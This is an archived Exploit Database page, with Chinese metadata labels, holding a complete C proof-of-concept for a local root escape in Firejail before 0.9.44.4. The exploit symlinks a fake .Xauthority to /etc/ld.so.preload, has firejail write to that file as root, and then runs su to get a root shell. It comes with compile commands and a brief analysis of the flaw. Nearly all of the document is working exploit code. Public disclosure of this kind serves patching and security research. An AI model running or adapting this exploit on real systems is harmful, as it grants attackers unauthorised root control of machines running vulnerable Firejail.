Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape

• Exploit Database
• 116 阅读

• 作者： Sebastian Krahmer
  日期： 2017-01-04
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/43359/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102

  /* firejail local root exploit (host to host) * * (C) 2017 Sebastian Krahmer under the GPL. * * WARNING: This exploit uses ld.so.preload technique. * If you are in bad luck, you may end up with an unusable system. * SO BE WARNED. ONLY TEST IT IN YOUR SAFE VM&apos;s. * * Get the beauty that this is a shared lib and a running * executable at the same time, as we tamper with /etc/ld.so.preload * * Therefore you have to compile it like this: * * $ cc -fPIC -fpic -std=c11 -Wall -pedantic -c firenail.c * $ gcc -shared -pie firenail.o -o firenail * $ ./firenail * * DO NOT TELL ME THAT SELINUX WOULD HAVE PREVENTED THIS EXPLOIT. * IF I WAS ABOUT TO BYPASS SELINUX ALONG, I WOULD HAVE DONE THE * EXPLOIT DIFFERENTLY. * * Analysis: Sandboxing is cool, but it has to be done right. * Firejail has too broad attack surface that allows users * to specify a lot of options, where one of them eventually * broke by accessing user-files while running with euid 0. * There are some other similar races. Turns out that it can be * _very difficult_ to create a generic sandbox suid wrapper thats * secure but still flexible enough to sandbox arbitrary binaries. * * Tested with latest commit 699ab75654ad5ab7b48b067a2679c544cc8725f6. */ #define _POSIX_C_SOURCE 200212 #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <errno.h> #include <sys/stat.h> #include <sys/types.h>     const char *const ldso = "/etc/ld.so.preload";   int main();   __attribute__((constructor)) void init(void) { if (geteuid()) return;   unlink(ldso); char *sh[] = {"/bin/sh", "--noprofile", "--norc", NULL}; setuid(0); setgid(0); execve(*sh, sh, NULL); exit(1); }     void die(const char *s) { perror(s); exit(errno); }     int main() { printf("[*] fire(j|n)ail local root exploit 2017\n\n");   char me[4096] = {0}, *home = getenv("HOME"); if (!home) die("[-] no $HOME"); if (readlink("/proc/self/exe", me, sizeof(me) - 1) < 0) die("[-] Unable to find myself");   char path[256] = {0}; snprintf(path, sizeof(path) - 1, "%s/.firenail", home); if (mkdir(path, 0700) < 0 && errno != EEXIST) die("[-] mkdir");   snprintf(path, sizeof(path) - 1, "%s/.firenail/.Xauthority", home); if (symlink(ldso, path) < 0 && errno != EEXIST) die("[-] symlink");   system("firejail --private=.firenail /usr/bin/id");   int fd = open(ldso, O_RDWR|O_TRUNC); if (fd < 0) die("[-] open"); write(fd, me, strlen(me)); write(fd, "\n", 1); close(fd);   char *su[] = {"/bin/su", NULL}; execve(*su, su, NULL); die("[-] execve su");   return -1; }